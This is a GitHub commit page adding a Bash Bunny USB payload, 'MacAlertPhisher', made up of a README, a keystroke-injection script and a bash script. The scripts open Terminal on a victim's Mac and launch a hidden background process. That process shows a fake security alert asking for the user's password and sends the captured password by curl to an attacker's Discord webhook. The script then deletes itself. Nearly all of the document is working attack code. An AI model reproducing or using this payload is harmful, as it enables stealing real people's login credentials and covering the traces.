-
Notifications
You must be signed in to change notification settings - Fork 1.5k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
3 changed files
with
89 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| # MacAlertPhisher | ||
| * Author: 90N45 | ||
| * Version: 1.0 | ||
| * Target: Mac | ||
| * Attackmodes: HID, STORAGE | ||
|
|
||
| ### Description | ||
| Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. | ||
|
|
||
| ### Setup | ||
| Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. | ||
|
|
||
| ### Status | ||
| | LED | State | | ||
| | --- | --- | | ||
| | Magenta solid (SETUP) | Set ATTACKMODE | | ||
| | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | ||
| | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | | ||
|
|
||
| *Average runtime: 26 seconds* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| #!/bin/bash | ||
| # | ||
| # Title: MacAlertPhisher | ||
| # Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. | ||
| # Author: 90N45 | ||
| # Version: 1.0 | ||
| # Category: Phishing | ||
| # Attackmodes: HID, STORAGE | ||
|
|
||
| LED SETUP | ||
| ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE | ||
|
|
||
| LED ATTACK | ||
| QUACK GUI SPACE | ||
| QUACK DELAY 1000 | ||
| QUACK STRING terminal | ||
| QUACK ENTER | ||
| QUACK DELAY 2500 | ||
|
|
||
| QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh" | ||
| QUACK ENTER | ||
| QUACK DELAY 1000 | ||
|
|
||
| QUACK STRING "diskutil eject /Volumes/BashBunny/" | ||
| QUACK ENTER | ||
| QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" | ||
| QUACK ENTER | ||
| QUACK GUI SPACE | ||
| QUACK DELAY 1500 | ||
| QUACK STRING terminal | ||
| QUACK ENTER | ||
| QUACK DELAY 500 | ||
| QUACK STRING "killall Terminal" | ||
| QUACK ENTER | ||
|
|
||
| LED FINISH |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,33 @@ | ||
| #!/bin/bash | ||
|
|
||
| # Discord Webhook Link (NEEDED) | ||
| discord="" | ||
| # The alert's text | ||
| dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." | ||
| # The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) | ||
| icon="stop" | ||
| # A custom application, that should open the alert (for ex. "Finder") | ||
| app="" | ||
| # Base64 encode the entered string to prevent an injection/syntax error | ||
| base64=false | ||
|
|
||
| #### The main script | ||
|
|
||
| if [[ ${app} != "" ]]; then | ||
| pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') | ||
| elif [[ ${app} == "" ]]; then | ||
| pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') | ||
| fi | ||
|
|
||
|
|
||
| pwd=${pwd#*"button returned:Continue, text returned:"} | ||
|
|
||
| if [[ ${base64} == true ]]; then | ||
| pwd=$(echo $pwd | base64) | ||
| curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord} | ||
| else | ||
| curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} | ||
| fi | ||
|
|
||
| # Self destruct | ||
| rm /tmp/script.sh |